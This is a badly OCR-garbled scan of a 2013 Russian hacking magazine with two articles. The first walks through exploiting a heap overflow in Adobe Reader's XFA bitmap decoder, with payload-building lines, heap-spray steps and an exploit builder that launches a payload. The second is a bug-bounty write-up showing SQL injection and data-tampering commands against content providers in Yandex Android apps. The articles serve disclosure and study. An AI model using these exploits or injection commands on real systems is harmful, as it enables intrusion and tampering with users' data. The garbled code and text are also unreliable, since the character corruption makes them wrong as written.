Бла | речотеалст | Регби Сорвь | Сы всё Чебики, | Тниньзе | ТОРИ | басы | Бла | Змеи | 


уеври РЫ 


Процесс, запущенный нашим Ргодгат.ехе 
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2.6 АсгоБа{8.1 /АсгоБа{8.11 

2.7 Асгора{ 8.1 ом 

2.8 Асгорбат 9.0, 

Асгора+{ 9 АЁГапд Театиге$ 
3.0 Асгора{ 9.1 
3.3 АсгоБат 10.0 
Местонахождение ХЕА-формы 

Хронология обновления ХРЕРА-формы в структуре РОЕ-документа 
вАдоре Веааег 


/АсгоРопт 


сааю9 — 


/Мееа$Вепаегта © 


/ХЕА 


сПаг * 11пе: 


АсоБае 8.1/АсгоБа! 8.11 

АсгоБа* 8.1 

АсгоБа+ 9.0, АсгоБа{ 9 АГапр {еа{игез 
АсгоБа! 9.1 

АсгоБа! 10.0 


аззегЕ(+ехкиге); _ 


ий11е (!Фео+(з{геат)) { 
Егеаа(&ста, 1, 2, °&геат); 
1+ ( сма.гер$ ) { 
азъегЕ ( уро5 < Не1ейЕ && ста.гер$ + хро5 <= млаеи ); 
// ВЕЕ-режим, повторение значения 
Фог(соип® = 9; соипе < ста.гер$; соип++) { 
]11пе = Жехфиге + (уро5*итаеи); 
11пе[хро$++] = ста.уа1че; 


} 
// Если ста.гер$ равна 9, то уа1ие — это команда 
} е\5е { 
м1 ЕСН (ста .уа1че){ 
сазе 09: Конец строки 
уро$ -= 1; 
хро$ = 0; 
бгеак; 
сазе 1: // Конец Б1тар 


гесигп фехфиге; 
// Разница (ае1*а), сдвигаем ВМР-указатель 
сазе 2: 
геаа (&х4е1Та, 1, 1, °Егеат); // Прочитать 1 
// байт 
геаа (&у4е1Та, 1, 1, °Егеат); // Прочитать 1 
// байт 
хроз += хае1*а; 
уроз -= уае1*жа; 


бгеак; 
дефаи1*: // Копирование 

азъегЕ ( уро5 < Пе1ей && ста.ма1ие + «= 

хро$ <= мтажи ); 

Фог(соип® = @;соупЕ < ста.уа1ие; соипй*++){ 
Егеаа(&аих, 1, 1, °&геат); 
11пе = «ехеиге+(м1аН*уро$); 
11пе[хро$++] = аих; 


1+ ( ста.уа1че & 1) // Заполнение 
Егеаа( &аих, 1, 1, °&геат); 


Как видим, в функциях тео), Теаа() и таНос() нет ничего необычного. Пе- 
ременная $Неап — это файл, откуда был прочитан ВМР-заголовок, включая 
высоту и ширину. Основное назначение функции — раскрыть сжатые АЕЕ- 
данные. 

Для начала выделяется достаточно памяти, чтобы поместилось полное 
изображение. Затем считывается каждый байт, чтобы определить, в каком 
режиме находятся данные: РИЕ, идет повторение байтов указанное коли- 
чество раз, или «чистом», и происходит переключение между различными 
опциями: 

. О — конец строки; 

1 — конец файла, завершить выполнение; 

2 — разница (аеКа), сдвигаем указатель записи (то есть пропускает пус- 

тые блоки); 

а (Четаи К) — обычные данные, копируем как есть. 


Если присмотреться внимательнее, то можно заметить, что при опции 2 нет 
проверки полученных данных с помощью функции а5зе\. Благодаря этому мы 
можем сдвинуть указатели на произвольную длину, что позволит нам выйти 
заграницу буфератекстуры. Тем неменее далее по коду при попытке записать 
что-либо в буфер происходит проверка: 


дефачц1*: // Копирование 
аззегЕ ( уро5 < НелеНе && ста.уа1ие + хро$ <= м1аеи ); 


Обратим внимание на раздел саз$е, в котором можно вызвать состояние 
переполнения кучи. Допустим, мы постоянно шлем команду разницы, про- 
двигающую переменную хро$. Иесли мы будем продолжать это делать без по- 
пытки записать что-либо, размер хро$ может стать очень большим, например 
Ох. В результатеу насбудетВМР содержащий ОхИННОО0/0хЯ командраз- 
ницы, и каждая изних будетувеличивать хро$на0хИ: 


тр += '\х@0\х02\х+ЕЕ\х00' * ((охЕЕЕЕЕЕЕЕ-ОхЕР) / ОхЕР) 


После заполнения мы передаем команду на копирование ОхН байтов на- 
прямую изфайлапоуказанномуадресу. Нотаккакхро5-1еп(рауюаа) заполняет 
представление 32-битного целого числа, при этом утвержденная граница со- 
храняется и переполнение становится возможным. 


тр += '\х@9\х@2 ' +спг(0х100-1еп(рау1оаа) )+' \х@@' 
тр += '\х@0 ' +спг (1еп(рау1оаа) )+рау1оаа 


В результате, используя этот баг, мы можем переписать 256 байтперелд бу- 
фером с текстурой. Теперь рассмотрим нюансы эксплуатации и запуска про- 
извольного Чама сир\. 


ЕХРЕОТ 

Размер кучи, выделяемой для текстуры, равен ширине и высоте найденной 
в ВМР-заголовке. И так как мы контролируем эти размеры, то можно обду- 
мать, чем полезным заполнить это пространство. Но для начала нужно повы- 
сить надежность и подготовить кучу для серии выделений памяти. Для этого 
мы будем использовать старый добрый метод — уауа$ спирт. Он будет выде- 
лять и освобождатьчасти кучи. Это будет выглядеть примернотак: 


Если присмотреться внимательнее, то можно заметить, что при опции 2 нет 
проверки полученных данных с помошью функиии а$$ет. Благодаря этому мы 
можем сдвинуть указатели на произвольную длину, что позволит нам выйти 
за границу буфера текстуры. Однако дальше по коду все же происходит проверка 


бо 


Взлом 


Схема 1 


[345617189 [01123145 [6781901 [231415167 


Схема2 


[34156 718]9] [121314 ]516[7[8]9] [1]213]4]5]6 |7 


Схема3 


[345617189] [1121314567819 1231415167 


Текстура 


Схема 4 


Свободная 
ячейка 


| | 
[3145617189] [1121314156 ]7|8) [[и]2[314[5]6 [7 


Предыдущая 
текстура 


У$-строка 


Схема5 


Свободная 
ячейка 


| 
[345617189] [1121314567 |8] [121314567 


У$-строка 


итозгис( {...} 


Схемаб 


Свободная 
ячейка 


| 
[31415167189] [11213456718] | 123415167 


итозгис( {...} 
Схема7 


Новая $ -строка 


Схема 8 


Новая /}$-строка 


[3145617189 81 12314]5 [67 |8 [1 |2[314[516[7 


итозгис{ {...} 


Новая /$-строка 


Схемы 1-8 


=—^ 


Выделяем 1000 0х12С частей контролируемых данных (схема 1). 
Освобождаем одну часть через каждые десять ранее выделенных, то есть 
генерируем несколько «нор» (дыр) (схема 2). Далее наша задача — полу- 
чить несколько указателей в уЧауа$сир{-интерпретатор, чтобы можно было 
обойти АЗЁВ и ОРЕР Чтобы сделать это, загрузим неправильное ВМР- 
изображение и повредим часть ЕЕН-кучи. Распределитель памяти будет 
думать, что строка в памяти с выполняемым уауа$ спирт свободна. 
Загружаем неправильное ВМР-изображение с размерами {1, 0х12С}, 
это и будет нашей пиксельной текстурой, которая распределится в одну 
из наших «нор» (схема 3). 

Исключение в ВЕЕ-декодере будет удалять все используемые структу- 
ры. А в данном случае часть кучи с текстурой будет освобождена. Но так 
как заголовок поврежден, удаление коснется предыдущей части и тек- 
стура останется одна. Данная неправильная ячейка может быть спокойно 
использована уауа$сир{-интерпретатором. Более подробно о такой тех- 
нологии можно прочитать тут: БИ.у/7с2хаК (схема 4). После этого у нас 
будет /4ауаЗспир\-строка, использующая память, которая должна быть сво- 
бодной. Распределение размером в 0х12С, возможно, будет назначено 
в ту же память и накладываться на ЧауаЗ спирт. В связи с этим нам нужно 
нацелить {$ на распределение в ту часть памяти, где есть объект, содер- 
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Е: \мюгК$ \ХаКер\Х_07_2013 \М71ОМ_ЕХРЕОТТ$>ХРАВМРЕхр101%.ру -В 
ИзаРе: ХЕАВМРЕхр]01.ру [ор®10п$] 


Адобе Веадег Х 19.1.4 ХРА ВМР ВЕ Ехр]01%* 


5Ном +115 Ве]р меззаре ап ех1+* 
Рог ЧеБире1те 
- -м5Ррау]оа9=МЗЕРАУГОАВ 

Мефазр]101* рау1оа4. Ех. 


--Чебие 


"и1п32_ехес СМО=са]с" 
- -рау]1оа9=РАУТОАВ 


- -(0с Рг1пЕ дефа1]е доситепеа оп 


Пример запуска конструктора для ХЕА-эксплойта 


жащий щаЫе$з. Это нужно, чтобы мы узнали расположение некоторых ОЕ 
из интерпретатора. Поэтому размер ячейки должен выбираться очень 
тщательно, чтобы это случилось автоматически и интересующий нас объ- 
ект распределился туда, куда указывает одна из строк $ (схема 5). 

5. Теперь прогоним все уауа$сир{-строки, чтобы найти ту, которая была из- 
менена: 


Фог (1=0; 1 < зргау.з11е; 1+=1) 
1+ ( зргау.х[1] != пи11 && 
5ргау.х[1][09] != "\ц5858"){ 


6. Если найдено, то парсим содержимое и ищем адрес АсгоВа3З2.а1: 


‚асго = (( иЕ11.ипрасКАЕ ( зргау.х[1], 14) >> 16) - оЕР5еф) << 16; 
бгеак; 


После этого у нас будет строка, которая находится в памяти с итазист 
и указывает на адрес АсгоВа.а! для /$-интерпретатора. Далее рассмо- 
трим процесс перезаписи структуры. В Чауа сир строки не так-то просто 
перезаписать. Для этого надо освободить старую и создать копию новой 
с нужными изменениями. Обычно если новая строка имеет схожий раз- 
мер со старой, то она будет распределена в то же место. Поэтому, изме- 
няя объект, нам нужно освободить выбранные строки и перераспределить 
их в ту же память с небольшими изменениями. 

7. Освобождаем выбранные /$5-строки (которые делили память с объектом) 
(схемаб). 

8. Создаем новую строку длиной 0х12С с желаемыми данными, используя 
полученные адреса, и спрей, который нужно расположить выше наших 
данных (схема 7). 

9. Распределение нескольких новых строчек с новыми данными (схема 8). 


В итоге объект будет заменен наодин изуказателей на ВОР-цепочку. 

Для контролирования выполнения кода нужно будет вызвать функцию дос. 
с10$е() в /$-интерпретаторе. Онавыгрузитвсе загруженные ХГА-изображения 
и будет использовать перезаписанную маЫе. Таким образом, перезаписан- 
ные указатели будутеще раз использованы в деструкторах, и контролируемые 
данные будутперехвачены. Последним пунктом предполагается, чтоуказатель 
на Пеар $ргау будет со знакомым адресом. В более продвинутых (оригиналь- 
ных) техниках, в которых другие части кучи указывают на интерпретатор, этот 
пунктне понадобится. 

Для реализации эксплойта автор написал свой конструктор на РУПоп (51. 
|у/11т КОВ) (о подобных конструкторах я немного рассказывал в своем вы- 
ступлении на РНВауз 2013). При запуске в *тх-системах в качестве шелл-кода 
можно использовать модуль из Мщазрюй тзрауюаа, он же используется 
по умолчанию. Для запуска из\М/таом/$ нужно будет указать полезную нагрузку 
черезопцию командной строки --рауоаа. Например: 


ХЕАВМРЕхр101*.ру --рау1оаЧ са1с.61п 
В результате унас будетРОЕ-документ, запускающий калькулятор. 


ТАВСЕТ$З 
ЭксплойтестьтолькоподАдореВеааег10-10.1.4, нохХЕА-формы используются 
сверсии 8. 


ЗОШИТОМ 
Доступно обновление с исправлением данной ошибки от производителя. Так- 
же для быстрого патча предлагается удалить файл АсгоРогт.ар!. == 


арах 1 


правлять своими счетами, используя си 


интернет-банка «Альфа-Клик» 


Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях. 
ОАО «Альфа-Банка», а также заказав по телефонам: 


8 (495) 788-88-78 в Москве | 8-800-2000-000 в регионах России (звонок бесплатный) 


ве 


62 Взлом 


1000$ *: 


НА ВЗЛОМЕ 
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ПРИЛОЖЕНИЙ 


ИЩЕМ УЯЗВИМОСТИ В АМОВОШО-ПРИЛОЖЕНИЯХ ЯНДЕКСА 


Мы уже рассказывали в журнале, как можно заработать на создании своих мо- 

бильных приложений тысячу долларов и больше. Сегодня же рассмотрим, что де- 
лать, если ты хочешь стать не просто разработчиком, а исследователем, и заодно 
продолжим серию статей про анализ багов в Апагоа-приложениях. В мартовском 


У 


Борис Рютин, 
ЦОР (Езадегар) 
б.гуит@ог.ги, 

@Чикерагтап 


номере была статья «Слабое звено» от представителей Яндекса, посвященная кон- 
тент-провайдерам и созданию своего приложения для анализа таких мест в про- 
граммах. Именно такие уязвимости и были найдены мною. 


ИНТРО 

Мониторингом новостей в мире безопасности Апаго@ я занимаюсь довольно давно 
ив марте 2012-го прочитал статью, посвященную уязвимостям в приложениях (01. 
|у/МЗ5!@К). Прочитал, попробовал и забыл. Но со стартом нового конкурса «Охота 
за ошибками» (01.1у/191а105) от Яндекса, да еще с пометкой, что они добавили в про- 
грамму мобильные приложения, пришлось вспомнить. 

Теорию про уязвимости в контент-провайдерах приложений мы разобрали в од- 
ном из прошлых номеров, поэтому заново ее приводить здесь не буду. Напомню лишь 
вкратце, что контент-провайдер — это поставщик данных. Каждое приложение может 
создавать свой контент-провайдер, который будет зарегистрирован ОС после уста- 
новки приложения. Проблема здесь кроется в том, что многие разработчики не уделя- 
ют должного внимания безопасности, и в результате в системе появляются контент- 
провайдеры, полностью открытые на чтение и запись, не говоря о том, что многие 
провайдеры уязвимы к ЗОЁ-инъекциям. Такие вот провайдеры делают возможным 
несанкционированный доступ к персональным данным. Если интересуют детальные 
подробности — можно изучить указанную выше статью, мы же оправляемся на охоту 
за багами. 


НАБОР ПАЦИЕНТОВ 
Для анализа мобильных приложений я использую реальное устройство — планшетный 
компьютер [епоуо КТ. Связано это с тем, что во многих моделях телефонов объем вну- 
тренней памяти ограничен, из-за чего нельзя поставить большое количество прило- 
жений. Также можно использовать эмулятор из Апагоа $ЗОК, но тогда надо установить 
на него Соод!е Рау или найти АРК-файлы приложений. 

АРК можно получить несколькими способами: 

перенести с устройства на компьютер, с помощью АВВ (см. врезку); 

воспользоваться скриптами с неофициальным АР! (см. врезку); 

установить шаманским образом Сооде Рау на эмулятор (6И.!у/130С085); 

скачать с сайтов, например 4Арда.ги («крякнутые» для ознакомления) и Тогит.хаа- 

де\ме!орег$з.сот (бесплатные и ореп $оигсе). 


Установить приложения в эмулятор можно двумя способами: 
через ООМ$ в Есйр5$е кнопкой «та! аррИсаНоп»; 
через АВВ командой «ааб па! арр.арк». 


Что касается подопытных, то исследовать мы будем сегодня 
мобильные приложения от компании «Яндекс», которых стано- 
вится все больше и больше. 


МЕВСОВУ — ВЕСТНИК БАГОВ 
Хорошо, с пациентами разобрались. Теперь посмотрим, 
что за зверь Мегсигу (1а6$.тм/иийозесигЙу.сог). Этот сканер 
уже не раз упоминался на страницах журнала. В данный момент 
доступна версия 2.2.0, ноя до сих пор использую иногда версию 
1.+, хоть и установлены обе. В новой версии разработчики объ- 
единили все разделы и назвали их модулями, плюс в ней были 
баги в выводе информации из заполненных таблиц (некоррек- 
тно выводилась информация на русском языке). Так что первая 
версия, на мой взгляд, проще и удобней в использовании, по- 
этому рассматриваемые примеры будут основаны на ней. Итак, 
скачиваем архив (Б®.1у/МллОпр) или берем его с нашего диска 
и видим, что программа состоит из двух частей: 
. клиент — РУПоп-программа, которую запускаем на компью- 
тере (успешно работает как в Ипих, так и в\ММпаом/5) 
сервер (в версии 2.0 сервер переименовали в агент) — АРК- 
приложение, которое можно установить любым из спосо- 
бов, описанных выше. 


Для соединения клиента и сервера нам понадобится [Р- 
адрес устройства. В случае если используется эмулятор, надо 
предварительно сделать переброс портов командой: 
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С: \Изег5\гоот\бомиоа4$ 


"ста еглсе Мопког ” 


а!4: 
пМобЙйенНриМоае: Га15е 


Узег 4[е: Га|5е 

ссгееп-оЙ: Га15е 

У5е Ачго5упс зе тя: Га|5е 

та${ Тпе{ гером: ${а{и$=100, пеТуре=0, 
08:285 ао 


\апаех.Маутеафог;ги. 


МитьЬег о? соппес{оп5: 1 

соппесйоп #1 

ВМО: 1+2 

Но5{: ица!К.зоозе.сот (173.194.69.188) 


Уз 


РОГ": 5228 Уапаех .Мопеу;ги. ап деХ шопеу; ‚11 5; 1; [ге 


\апаех 
ГО: дикерагтап@ятай.сот/ 


\вооЕ1ер]ау-ар1-тазег\Роое1ер1ау-ар1-тазВег>зеагоИ.ру уапаех 
Т11е;РасКаре пате;Сгеафог;бирег беу;Ргасе;ОРег Туре;\Мег5лоп Соде;$1те; Ка] 
те $тсе зегусе сгеаЦоп: 117:06:17 Уапаех .Марз;ги. уапцах. уапаехтарз: АИ тм 5;1:Егее;1;312;11.2М8; 4. 52:5 000 ,008+ 
Уапдех .Ма11; ги. уапдех .па11; 11 41 |-5;1;Егее;1;179;3.3М8; 4.51;1,000,600+ 

Узег 1е ИтесцЕ м т5: 30000 Уапдех.Зеагсй:ги.уапаех. сеагспр1ие3 п; ПИ ЦБ; 1;Ргее; ние ЕЕ 48;1,000,0099+ 
Уапфех .5Не11;ги.уапдех. $Ве11; 1141 т5;1;Егее;1;21067;19.1М8;4 
уапдех .уапдехпам1 ; 
Уапдех .Ме+го;ги.уапдех мего; МЫ т6;1;Егее;1;164;2.0М8;4.76;1,000,000+ 


\апаех.МеаПег; ги. уапдех . ме вает; 1 
УапЧех. 01 5К:ги. уапёех. 41 5К 
ИЕР ВЕЕТ \Уапаех .Тга{1с м14ееф;ги.уапаех .уапаехга+41с; Ив, 1; Егее; 1; т 318. 5КВ 


\апаех . Орега п сот.орега. м1и1. -апдго14. уа 
Уапаех Орега Моб 1е; сот.оре уапа 


1000 $ на взломе приложений 63 


Мим бони оа@$ 


Е, 


р 2 


}.24:1,009, 000+ 
ПиЩи и б, 1; гее;1;1301;12.4М8;4.28;1,000,000+ 


УУАКММС 
Уапфех .МагКе\; ги .уапдех. шагке*; Пл М 1 Е Б;1;Ггее;1;120;6.3М8;4.15;1,000,000+ 
НИЦ .5; 1;Ргее;1;300;5.3М8;4.24;1,000,000+ 
п ПА Чибза; ге; 1;114;3.0М8;4.55;190,0900+ Информация 
В;4.37;1, предоставлена 
\апаех.К1поа15Па;ги. уапфех. аР15Па; Ц |-5;1; Ргее;1:111;324. 1КВ;4 .11; ‚90, 899+ исключительно 
ох. И Е 1|-5;1; ге ое Ри, —_ ны 
‘Чех; ИЦ | -5;1;Егее;1;23;902.3КВ;4.45;500,000+ целях. Ни редакция, 
зп |-5;1;Егее;1;1301071639;9.3М8;4.49;500, 000+ НН 
\Уапдех . №ем5 и ых | пес ; т т 1; Ргее;1;110;:595.8КВ;3.87;100,00 ответственности 


соппесй оп еггог: МО ЕККОК 


Ргезепсе: ИМАУАТАВЕЕ Уапдех. РОК ;ги.уапдех. Тока; Ап 
п(епдей ргезепсе: ЧУМАУАЦ.АВЕЕ 


а${ пеймогК ${а{е по Ясайоп: 0/СОММЕСТЕВ 


Результат команды *#*#8255#*#*, 
где показан Апагоа!О 


ааб Фогмага {ср: 31415 ср: 31415 


Соответственно, 1ШР-адрес для сканера будет 
127.0.0.1. На реальном устройстве достаточно в списке 
\ММ-Н-сетей просто кликнуть по текущей подключенной 
сети, и появится всплывающее окно с подробной инфор- 
мацией о качестве, типе безопасности и нужном нам [Р- 
адресе. 

Перед тем как запустить на компьютере клиент, 
на устройстве нужно запустить приложение-сервер 
(агент) и перевести переключатель в положение «Вкл» 
(Оп). В версии 1+ это единственная опция, в версии 2+ 
добавили возможность шифровать трафик, запаролить 
подключение и другие. 


ру{Воп тегсигу.ру 
# Коннектимся к устройству 


*тегсигу > соппесе ТР 

# Список команд 

*тегсигу > Пе1р 

# Выбираем раздел контент-провайдеров 

*тегсигу > ргоутаег 

# Позволяет найти провайдеры приложения 
*тегсигу#ргом1Аег>Япаиг1 ги.$1%е.арр 

# Позволяет сделать зе1ес*-запрос к провайдеру 
*тегсигу#рго\1адег>диегу сопфепт : //сопфеп*.арр 


С помощью таких запросов можно получить все данные 
таблицы, изменить, если хватает прав, и провести $01- 
инъекцию, которая позволит получить всю БД. 

Ну что ж, основы мы разобрали, теперь примемся 
за сами баги. 


ЯНДЕКС.КАРТЫ 
Обзор уязвимостей начнем с популярной программы — 
Яндекс.Карты. Во время тестирования версия у програм- 
мы была 3.02, сборка 2945. 

С помощью команды Япаип попытаемся спарсить кон- 
тент-провайдеры: 


Пидиг1 ги. уапаех . уапдехтар$ 
и получаем список (он больше, оставил только уязвимые): 


соптепт : //ги.уапаех . уапаехтар$ .Бгапа1 пе. <= 
тедафоп .МеваРопСоп*ас*$Ргоу1дег/тева+оп_сопфас*$ 


сопфепт : //ги.уапаех .уапаехтар$ .Бгапа1п8 .тф$ . «= 
МЕ$Сопфас&$Ргом1Аег/тЕ$ _сопфаст$ 


соптеп* : //ги.уапаех . уапдехтар$ .1абе]$ .‹= 
Е абе1 $Ргоу1дег/ту1аБе1 $ 


\апаех. Тгалпз ;ги.уапаех .газр; 1 т тБ;1;Егее;1;219;1.7МВ;4.63;599,000+ 


залюбой возмохж- 


141 5:1. РГгее: 1+ ты 1915. 3КВ;3.55;100, 000+ НЫЙ вред, причинен- 
\апаех.Аифо;ги.уапаех .аио; аи |5; 1;Егее;1;102;2.7М8;4.30;100,000+ ный материалами 
\Уап4ех Тгап$]а*е; сот. 12Р]а.уапдех.гапз 1ае; Теог а: @;Егее;1;8;:3.8М8;:4.64:10,000+ ь 
даннои статьи. 


Яндекс-программы в боод!е Р!ау 


сопфепт : //ги.уапаех .уапаехтар$ .тар.м1авеф$ .ИСоттип1уМооаРго\1аег/тооа 


сопфеп* : //ги.уапаех .уапаехтар$ .гоц%е$ .ВоиеН1$огуРгом1аег/гоицей1 $Фогу 


соптеп* : //ги.уапаех . уапдехтар$ . изегзро1п®$ .И5егРо1п$Соттепт$Рго\м1аег/‹= 
иро1п*$5и58 


Наибольший интерес представляет контент-провайдер, ответственный за закладки пользо- 
вателя, — сощеп://ги.уапаех.уапаехтарз$.1абе!$.1абе!$Ргомаег/туабе!$. Ведь мы можем изме- 
нить ему координаты! Получаем все сохраненные закладки: 


дчегу сопфеп* : //ги.уапаех .уападехтар$ .1абе1$ .абе1$Рго\у1Аег/ту1аБе1 $ 

еосоде 1абе1 пате_фо1омег Топ Дате ]1абе]1_пате _1А Та 
Москва, Меигопзрасе.ги 37.5732 1352196244367 Меигопзрасе.ги 1 ИИ 7) 
Россия, 

Лужнецкая 

набережная, 
2/4с17 
Москва, Могк 
Россия, 
Лужнецкая 
набережная, 
2/4с17 


37.5732 1352196427356 Шогк 2 55.7137 


Изменяем: 


ирафе соптепт : //ги.уапаех .уапдехтар$ .1аБе1$.ЁаБе1$Рго\у14ег/ту]абе1 $ <= 
--571п2 1абе]1_пате_Фо]1омег=Ноте 1абе1_пате=Нотме --мйеге _19=2 
дчегу сопфеп* : //ги.уапаех .уапаехтар$ .1аБе1$ .абе1$Рго\у1Аег/ту1аБе1 $ 


сеосоде 1]абе1_ пате_%о1омег 1оп аее ]1абе] пате 1а Та* 


Москва, Меигопзрасе.ги 37.5732 1352196244367 Меигопзрасе.ги 1 557139 
Россия, 

Лужнецкая 

набережная, 

2/4с17 

Москва, Ноте 37.5732 1352196427356 Ноте 2 55.7137 
Россия, 

Лужнецкая 

набережная, 

2/4с17 


Как видим, на закладке были координаты работы — стали дома. 

Что может сделать атакующий в этом случае? Давай пофантазируем. Например, человеку 
дали координаты места, где он должен заплатить кредит или куда просто привезти деньги. Ата- 
кующий меняет этот адрес и ждет его там :). 


ЯНДЕКС.ТАКСИ 
Следующая наша жертва — Яндекс.Такси. Уязвимая версия была под номером 1.80, сборка 365. 
Как и в случае с Яндекс.Картами, ищем контент-провайдеры: 


Пидиг1 ги. уапаех .*ах1 


64 Взлом 


соптей* : //ги.уапаех .Фах1 /Фах1 

соптеп* : //ги.уапаех .Жах1 /4е]ау_огаег 

соптей* : //ги.уапаех .Фах1 /И1$огу 

соптеп* : //ги.уапдех .ах1 /с1{1е$_м1И_а1гроге 


Пример данных из таблицы аеау огаег: 


рагк_рпопе @4езс рагк 19 _14 рагКк _10ово рагК_пате Фаг1 ЕР 14 эгс огаег_л1а 


Или более интересный провайдер сощеп:://ги.уапаех{ах/ИсШе$ мИП_айиром, в этом 
случае, в отличие от ае!ау_огаег, возможно полное раскрытие БД через запрос "* ЕВОМ 
заще тазег--": 


фуре пате {61 пате 
фаб1е апаго149_ тефадафа апаго149_ тефадафа 3 


гоофраёе $41 
СКЕАТЕ ТАВЕЕ 
ап4го1а_тефада{а 
(1оса1е ТЕХТ) 
СКЕАТЕ ТАВЕЕ с1®у 
(_1а ТМТЕСЕВ 
РКТМАКУ КЕУ, пате 
ТЕХТ ‚, зеагсй_пате 
ТЕХТ) 
фаб]е {ах1 фах1 5 СВЕАТЕ ТАВЕЕ Жах1 
(_1а ТМТЕСЕК 
РКТМАКУ КЕУ, Фах1 _ 
14 ОМС , 10оса11у_ 
пате 
\АКСНАК (50) , пате 
ТЕХТ ‚, рпопе 
ТЕХ, ЧЕ ТЕХТ) 


фаб1е с1*®у сту 4 


Помимо этого, не было запрета на изменение данных. Например, можно было поме- 
нять номера машины, мобильного и другую информацию о ближайших к пользователю 
такси в таблице {аж.. 

Также был доступ к таблице Ш$огу, в которой можно было узнать историю как поис- 
ка, так и вызовов. Информация такого рода понадобится не каждому злоумышленнику, 
но каким-нибудь ревнивцам или частным детективам может быть интересной. 


ЯНДЕКС.ЭЛЕКТРИЧКИ 
Следующая уязвимая программа — Яндекс.Электрички. Здесь тоже была обнаружена 
уязвимость типа 50! -инъекции в БД с возможностью изменения данных. 


дчегу соптепт : //ги.уапаех .газр/Я1е$ --ргодес®1опт "* РЕКОМ ‹- 
$4911%е_тазег--" 
фуре пате 


+6] пате гоофраде $41 


{аб1е #1ез #1е$ 4. 


СВЕАТЕ ТАВЕЕ #Я1е5 

1 1пфегег рг1тагу Ке 
аифо1псгетеп®, ефаё Техф, 
1аъ{ тоа1Яеа фехе, пате 
фехе, геё1оп фехф, 
1аз{ ирЧафеа 1опз, ОМТОЦЕ 
(паме)) 


Для примера изменения данных поменяем путь к кешу файлов: 


ирдафе соптепт: //ги.уапаех .газр/®1е$ --5$г1пё паме += 
"/зузет/засага/Паск.+хЕ” --мИеге _19=2 


_1А ефаё 1аз*_ тоЧ1Ае пате геё1оп 1а5*_ирда*ед 
2 96с6ас0620 — пи11 /зузет 213 1352462705854 
а+59еа4еаа /засага 
14саее81а1 /паск. хе 
9еа08+0259 
1 548+13с285 — пи11 /дафа/4ата 1352462705064 
59@сдЬсват /ги.уападех. газр 
66561349248 /саспе 
9е76е4678а {/{а11_с1%1е$5.сасйе 


Благодаря Этой уязвимости злоумышленник мог бы читать и изменять списки люби- 
мых и недавних станций. Также изменение пути до кеша могло «уронить» приложение или 
поменять расписание, если у пользователя отсутствовал в этот момент интернет. 
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руно сет рЕа груЕНоп первсцру сопоо1= соппесе зетиее 172.94.94.64 


и 5, 


„пайеЕНайгазтаеЕ На неды . 
„ „ИО та]ЕНаЕро1тотпейеЕНед ко +. 


.Сролсопе. -ОЕНнейрозаЕНеней. -чупева Е. 
„паЕротопойеНнейнолае Неван уяеса 1 ЕНае. 
„ротзопейенедко Ч ЕНе Е лоуас та 1ЕНаЕроле . 
„опейерейно Я Е Не вело уаева Е рабротеотей 
„ЕПЕйно те Не Неа иле са Е Наеро т зопедеНей . 
е1есетгу З7РРсееь9 4930 СЫЕНОУО КТ 4.1.1. 


Нарситу Сопео 18 
герои еух Не]р 


Нелсигу: Ее Неаоу Мова! ЕНаЕ Ро12опей ЕНе ОкоШЯ 


Тыре Не1р СОННАНО Рок поке ЗпРовластоп оп а ракете Та согытагой, 0% Не] 
НОБИЦЕ ог а рагЕлси1ае поди. 


Сорин 2 


с сопераЬиеокЕ  ехаЕ Вр 1а5Е 10а пойы]е вп  вНе11 


В 


Стартовое окно программы Мегсигу версии 2.1.0 
Е: \ЗОРТ\апдго19_гезеагсИ\тегсигу-ч1.1\ с ПепЕзтегсигу. ру 


м мы 
а са ес 
.Г...ЕтТГИтТГИТ.. И 
„РЕТТИТИТИГИТИ.. 
„ТТТ +. 
... ГТЕЕИГИОГГГИГГГГЕГИ:. 
«ТИТ 1.. 
„ТТТ, .., ТТТ, ..,ТТТТИТ. 
„РТТЕЕИТ. ТТИ. .ГТТСЕОТ. 
 АТТЕИТИТТИТЕТТГТГИТТЕГТТТ 1. 
«ТТТ. 
„пап аицииаанииинии 
«ТТТ ттт 


ТЬе Веауу тефа] Наф ро15опеЯ Не дго1а 


шегсигу> соппесЕ 192.168.0.107 
*пегсигу>» Ве]р 


Соттат95 - Фуре Вер <соттапа> Фог поге 1по 


асе1у1фу Бгоадсаз+  ех1 тмоди!е$ расКарез зегузсе №0015 
Баск деБиеваБ1е Ке]р па уе  ргоут4ег  $Ае]] 
*тегсугу> 


Стартовое окно программы Мегсигу версии 1.1.0 


Окно серверной части наустройстве 


СЕРИЯ ОДНОТИПНЫХ УЯЗВИМОСТЕЙ 
Под таким заголовком будет одна уязвимая таблица, которая 
была найдена во всех приложениях. Как я понимаю, был напи- 
сан код, который помогал в идентификации клиента, и его до- 
бавили во все приложения. Первая программа стакой уязвимо- 
стью — Яндекс.Почта. 

Пример отдельного вызова к таблице демсе в: 


соптеп* : //ги.уапаех .ае\у1се.14.та11/4еу1се_14 
_1а де\1се_1а 


т 90224а14611111111111111114аеаб5 
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Или можно получить всю структуру, добавив в запрос наш любимый "* ЕВОМ зайе_ 
пазег--": 


фуре пате {61 пате гоофраёе $41 

Таб1е апдго14_тефтадафа ап@го1А_тефадафа 3 СКЕАТЕ ТАВЕЕ 
ап4го1а_тефадата 
(Лоса1е ТЕХТ) 

фаб1е аеу1се_1а е\у1се_1а 4. СКЕАТЕ ТАВЕЕ 

е\1се_1а (_1а 

ТМТЕСЕК РКТМАКУ 

КЕУ , Че\у1се_14 ТЕХТ 

ИМТОЧЕ) 

1паех $411е_ач®о1пдех Чеу1се_1а 5 пи11 

_Че\у1се_1а_1 


При общении с представителями безопасности Яндекса выяснилось, что уязвимость 
возникла после обновления, так как неправильно выставили права: 


*тегсигу#ргому14ег> 1пРо -+ аеу1се.1а 

Раскаёе пате: ги.уапаех .та11 

АчтПог1фу: ги.уапаех .аем1се.1а.та11 

Веди1геа Регт1$$1оп - КеаЧ: пиу11 

Кеди1геа Регт1$$1оп - Иг1е: ги.уапаех.аем1се_1а. РО 
Сгап* ЦУг1 Регт1$$10п$: +а15е 

Ми11ргосе$$ а1]оме: +а15е 


Как видишь, напротив прав на чтение стоит значение пи!. Это и позволяло другим пользо- 
вателям обращаться к этой таблице. Кроме того, не было фильтрации запроса, что позво- 
лило произвести инъекцию. 

Следующая программа — Яндекс.Навигатор с этой же проблемой. Обращаемся сразу 
к уязвимому провайдеру: 


сопфеп* : //ги.уапаех .4еу1се.14 .па\у1 /аиПог1у 

фуре  пате {6] пате гоофраёе $41 

